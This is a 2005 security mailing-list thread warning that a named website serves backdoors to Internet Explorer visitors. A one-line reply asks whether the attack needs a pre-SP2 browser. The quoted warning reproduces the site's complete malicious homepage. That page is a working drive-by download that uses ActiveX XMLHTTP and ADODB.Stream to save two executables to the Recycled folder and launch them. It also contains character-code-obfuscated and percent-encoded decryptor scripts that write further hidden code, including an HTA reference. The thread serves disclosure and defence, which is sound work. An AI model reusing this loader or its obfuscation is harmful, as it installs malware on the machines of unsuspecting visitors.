[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4342043C.3000107@logicaldevelopments.com.au>
Date: Tue Oct 4 05:25:50 2005
From: jallen at logicaldevelopments.com.au (Justin Allen)
Subject: http://molecularmultimedia.com/ an exploit
distribution point
Wouldn't this only work on non-SP2 versions of Internet Explorer?
Aditya Deshmukh wrote:
>ALERT do not visit with internet explorer http://molecularmultimedia.com/
>
>It attemps to download 2 backdoors - anyone want to inform them ?
>
>The homepage is a script
>
>('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody);o.SaveTo
>File(d,2)
>
>Full script in the attachment...
>
>
>________________________________________________________________________
>Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
>
>------------------------------------------------------------------------
>
><html><head>
><title>Empty</title>
><body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
><body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
><script>function s() {return true;}
>window.onerror=s;var d="C:\\Recycled\\Q330995.exe";
>try{
>b=new ActiveXObject("Microsoft.XMLHTTP");b.Open("GET","kav.exe",0);b.Send();o=new ActiveXObject('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody);o.SaveToFile(d,2);
>}catch(e){};
>try{document.write("<object classid=clsid:11311111-1111-1111-1111-111111111157 codebase='"+d+"' style=display:none>");}catch(e){document.write("<object classid=clsid:10000000-1000-0000-10000-000300000001 codebase='"+d+"' style=display:none></object>");}</script><object classid=clsid:10003000-1000-0000-10000-000000000001 codebase=kav.exe></object>
><script>
>d="C:\\Recycled\\Q33099.exe";
>try{
>b=new ActiveXObject("Microsoft.XMLHTTP");b.Open("GET","kav1.exe",0);b.Send();o=new ActiveXObject('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody);o.SaveToFile(d,2);
>}catch(e){};
>try{document.write("<object classid=clsid:11311111-1111-1111-1111-111111111157 codebase='"+d+"' style=display:none>");}catch(e){document.write("<object classid=clsid:10000000-1000-0000-10000-000300000001 codebase='"+d+"' style=display:none></object>");}</script><object classid=clsid:10003000-1000-0000-10000-000000000001 codebase=kav1.exe></object>
></head>
><!--LiveInternet counter--><script language="JavaScript"><!--
>document.write('<a href="http://www.liveinternet.ru/click" '+
>'target=_blank><img src="http://counter.yadro.ru/hit?t38.6;r'+
>escape(document.referrer)+((typeof(screen)=='undefined')?'':
>';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
>screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
>';'+Math.random()+
>'" border=0 width=0 height=0 title="liveinternet.ru"></a>')//--></script><!--/LiveInternet-->
><script>
>
>var hr=location.href,st='',k='',s='',b='cgabbfbbgbcbbaibabcgccdfbcacfaceecdfbcacfbbcdbbcbbbbbfbafbbgbafbbbbbacficjhcjibbfbbbbaibbhbbgbabcfjbaibabbacbbgcficefcejceiceiceicfjbcfcgacehbbfbbgbcbbaibabcgccgachjcggchecgjcghciecdcbafbaacgbbcacfacdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgabbccjhbbecjhbajcdcbbacjhbajbabcgbcdecidcjjbbebbbbaibaicjicjhbbebbfcdecdcbbicjhbaibbhbabcgbcdebbgbbebbhbabcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbajbbfcefbafbbgbbfcfibafcjjbbjbaabafcjhbaicegcjjbaebajcficficehbafcjjbbjcjfbbbbbibabbbebbibafbabbbjcegbaebbgbajcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbcacfacegchcchccghbaibafcjjbahceacebcfjbbjbafbbabaabbbbbjcegbbbbbcbabbbababbbecegbacbbbcjjbbhbbfceacebcfjcgacehbbfcjjbbebafbbcbbgcgccgachjcggchecgjcghciecdcbafbaacgbbcacfbcdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbagcjhbbicjhbbfcjjbbebafbbcbbgcfibaabbbcjjbbhbajbabbbabbgcegbaibafbbabahbbfcjbceicjdcegbaebbebabbaccgbcdjcgjciicgjcghcgbceebajbbfbaebbgcjhceecdhcdccdccghchcchhcgbbafbabbbfbaecjhbbebabbaacegcjjbaebajcdcchachdchgcgjcgbcjhbbcbbccjfbafbbabbfbbgcjhbaibaicegbaebbgbajcdjcdhcfbcggbaabbbcjjbbhbajbabbbabbgcegbaibafbbabahbbfcjbceicjdcegcjjbaibafcjjbahceacebcfjcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbbfbabbbgciebafbajbabbbbbbhbbgceacdjbcacfbcegchcchccghbaibafcjjbahceacebcfjcdjceecejceiceiceicebcfjbbfbabbbgciebafbajbabbbbbbhbbgceacdjbbjbafbbabaabbbbbjcegcjjbaibbbbbfbabceacebcfjcdjceecejcfaceiceicebcfjcgacehbbfcjjbbebafbbcbbgcgc';
>
>for(i=0;i<b.length;i++)
>{
> s+=b.slice(i,i+1).charCodeAt(0)-97;
>};
>
>for(j=0;j<String(s).length;j+=3)
>{
> k=parseInt(String(s).slice(j,j+3));
> if(k>200){k-=200;}
> st+=String.fromCharCode(k);
>};
>
>document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/web.hta'));
></script>
><SCRIPT LANGUAGE="Javascript">
>var pe="%20%20%20%20%20%3C%48%45%41%44%3E%3C%4D%45%54%41%20%48%54%54%50%2D%45%51%55%49%56%3D%22%45%78%70%69%72%65%73%22%20%43%4F%4E%54%45%4E%54%3D%22%2D%31%22%3E%0A%20%3C%2F%48%45%41%44%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%0A%3C%74%65%78%74%61%72%65%61%20%69%64%3D%22%63%6F%64%65%32%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%0D%0A%74%3E%65%63%62%6A%2F%6F%3E%3C%74%22%6C%65%70%74%72%69%73%63%78%2D%74%2F%65%78%22%74%65%3D%79%70%20%74%6D%22%68%74%63%2E%78%65%2F%65%3A%3A%68%6D%2E%63%2F%78%43}%53%52%24{%74%21%6D%68%6F%2E%0C%6F%64%3A%2F%2F%65%3A%69%6C%3A%66%6D%6C%68%74%3A%6D%74%73%2D%69%6D%73%3D%22%74%61%64%61%74%20%65%63%62%6A%3C%6F%0D%0A%3C%2F%74%65%78%74%61%72%65%61%3E%0D%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%64%65%63%72%79%70%74%28%79%29{%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%69%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%32%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%28%79%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%3E%3D%30%3B%69%2D%2D%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%32%2B%3D%79%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%31%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%30%3B%69%3C%28%74%32%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%2B%2B%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%2B%31%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%2B%3D%31%3B%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%74%31%3B%0D%0A%20%20%20%20}%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%32%2E%76%61%6C%75%65%3D%64%65%63%72%79%70%74%28%63%6F%64%65%32%2E%76%61%6C%75%65%29%29%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%32%2E%76%61%6C%75%65%2E%72%65%70%6C%61%63%65%28%2F%5C%24{%53%52%43}%2F%67%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%27%2F%27%29%29%29%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A"
>document.write(unescape(pe))
></script>
><SCRIPT LANGUAGE="Javascript">
>var hash="%20%20%20%20%20%3C%48%45%41%44%3E%3C%4D%45%54%41%20%48%54%54%50%2D%45%51%55%49%56%3D%22%45%78%70%69%72%65%73%22%20%43%4F%4E%54%45%4E%54%3D%22%2D%31%22%3E%0A%20%3C%2F%48%45%41%44%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%0A%3C%74%65%78%74%61%72%65%61%20%69%64%3D%22%63%6F%64%65%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%0D%0A%74%3E%65%63%62%6A%2F%6F%3E%3C%74%22%6C%65%70%74%72%69%73%63%78%2D%74%2F%65%78%22%74%65%3D%79%70%20%74%6D%22%68%74%78%2E%3A%2F%6D%3A%63%68%78%2E}%2F%54%48%50%41%24{%74%21%6D%68%6F%2E%20%6F%64%3A%2F%2F%65%3A%69%6C%3A%66%6D%6C%68%74%3A%6D%74%73%2D%69%6D%73%3D%22%74%61%64%61%74%20%65%63%62%6A%3C%6F%0D%0A%3C%2F%74%65%78%74%61%72%65%61%3E%0D%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%64%65%63%72%79%70%74%28%73%29{%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%69%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%32%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%28%73%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%3E%3D%30%3B%69%2D%2D%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%32%2B%3D%73%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%31%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%30%3B%69%3C%28%74%32%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%2B%2B%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%2B%31%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%2B%3D%31%3B%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%74%31%3B%0D%0A%20%20%20%20}%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%2E%76%61%6C%75%65%3D%64%65%63%72%79%70%74%28%63%6F%64%65%2E%76%61%6C%75%65%29%29%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%2E%76%61%6C%75%65%2E%72%65%70%6C%61%63%65%28%2F%5C%24{%50%41%54%48}%2F%67%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%27%2F%27%29%29%29%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A"
>document.write(unescape(hash))
>
></script>
></body>
></html>
>
>________________________________________________________________________
>Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
--
<pre>Justin Allen
Software Developer
Logical Developments
Phone: +61 8 9458 3889</pre>
Powered by blists - more mailing lists